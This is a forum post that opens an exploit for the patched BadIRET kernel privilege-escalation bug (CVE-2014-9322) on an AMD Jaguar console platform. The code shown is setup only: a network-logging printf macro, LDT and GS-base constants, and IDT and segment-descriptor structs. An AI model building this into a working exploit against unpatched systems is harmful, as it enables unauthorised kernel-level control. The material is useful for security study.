https://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
- so for those who have heard of cturt's technical write-up on the patched badiret vulnerability, the link I have included at the top is a short refresher.
- again, the shorthand prerequisites for triggering the vulnerability require you to be able to map memory, depending on your host platform and the system specifics related to satisfying these conditions.
- in this case we are dealing with an "amd jaguar apu", so you can already kind of guess that mapping is obviously done in multiples of the page size set for your system.
- with that said, seeing as badiret has already been patched, no one will probably care for this. but while it is good to never bite the hand that feeds you, it's also good to be able to see what is in plain sight.
Code:
#include "threadshit.h"
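/*
 * Route printf() output to the network socket `sock` via sceNetSend().
 * `sock` and sceNetSend() are not declared here (presumably they come from
 * threadshit.h).  The message is formatted into a fixed 512-byte stack buffer,
 * so the write must be bounded: the original sprintf() could overrun the
 * buffer on a long message; snprintf() truncates instead.  A formatting error
 * (negative return) sends nothing, and a truncated message is clamped to the
 * bytes actually present in the buffer.
 */
#define printf(format, ...)\
do {\
char buffer[512];\
int size = snprintf(buffer, sizeof buffer, format, ##__VA_ARGS__);\
if (size < 0) break;\
if ((size_t)size >= sizeof buffer) size = (int)sizeof buffer - 1;\
sceNetSend(sock, buffer, size, 0);\
} while(0)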
#define CORE 6                      /* core index; how it is used is outside this excerpt */
#define FALSE_SS_BASE 0x10000UL     /* base address for the segment set up below — see the linked write-up for its role */
#define MAP_SIZE 0x10000            /* 64 KiB mapping; a multiple of the page size, as the post notes */
#define MAP_ANON 0x0002             /* NOTE(review): mmap flag values differ between platforms — confirm against the target's <sys/mman.h> */
#define I386_SET_LDT 1              /* sysarch(2) op number; matches FreeBSD's I386_SET_LDT — verify against the target SDK */
#define LDT_AUTO_ALLOC 0xffffffff   /* "let the kernel choose the LDT slot" value; matches FreeBSD's LDT_AUTO_ALLOC */
#define SDT_MEMRWA 19               /* segment descriptor type: read/write data, accessed; matches FreeBSD's segments.h */
#define AMD64_GET_GSBASE 130        /* sysarch(2) op: read the GS base; matches FreeBSD's value */
#define AMD64_SET_GSBASE 131        /* sysarch(2) op: write the GS base; matches FreeBSD's value */
/*
 * In-memory form of the IDTR pseudo-descriptor (the operand of SIDT/LIDT):
 * a 16-bit limit followed by a 64-bit base, 10 bytes total.  Packed so the
 * compiler inserts no padding between the two fields.
 */
struct idt_ptr_struct
{
uint16_t limit; // Size of IDT table (bytes minus one, as the CPU stores it)
uint64_t base; // Base address of IDT table
} __attribute__((packed));
/*
 * One 16-byte x86-64 IDT gate descriptor.  The handler address is split
 * across target_offset_low / _mid / _high; ist_reserved_bits holds the IST
 * index in its low 3 bits (the rest reserved); access_bits carries the gate
 * type, DPL and present bit.  Packed to keep the hardware layout exact.
 */
struct idt_entry_struct
{
uint16_t target_offset_low;  /* handler address bits 0..15 */
uint16_t target_selector;    /* code segment selector loaded on entry */
uint8_t ist_reserved_bits;   /* IST index (low 3 bits), remaining bits reserved */
uint8_t access_bits;         /* gate type, DPL, present */
uint16_t target_offset_mid;  /* handler address bits 16..31 */
uint32_t target_offset_high; /* handler address bits 32..63 */
uint32_t reserved;           /* must be zero */
} __attribute__((packed));
/* Short aliases for the two IDT structures above. */
typedef struct idt_entry_struct idt_entry_t;
typedef struct idt_ptr_struct idt_ptr_t;
/*
 * 8-byte legacy (code/data) segment descriptor, bit-fields listed from the
 * least significant bit.  Field names and layout follow FreeBSD's
 * struct user_segment_descriptor in <machine/segments.h>; the sd_type field
 * takes values such as SDT_MEMRWA above.  Bit-field packing in a uint64_t is
 * implementation-defined in C, so this relies on the GCC/Clang x86-64 ABI
 * laying the fields out in declaration order from the LSB.
 */
struct user_segment_descriptor {
uint64_t sd_lolimit:16; /* segment extent (lsb) */
uint64_t sd_lobase:24; /* segment base address (lsb) */
uint64_t sd_type:5; /* segment type */
uint64_t sd_dpl:2; /* segment descriptor priority level */
uint64_t sd_p:1; /* segment descriptor present */
uint64_t sd_hilimit:4; /* segment extent (msb) */
uint64_t sd_xx:1; /* unused */
uint64_t sd_long:1; /* long mode (cs only) */
uint64_t sd_def32:1; /* default 32 vs 16 bit size */
uint64_t sd_gran:1; /* limit granularity (byte/page units)*/
uint64_t sd_hibase:8; /* segment base address (msb) */
} __attribute__((packed));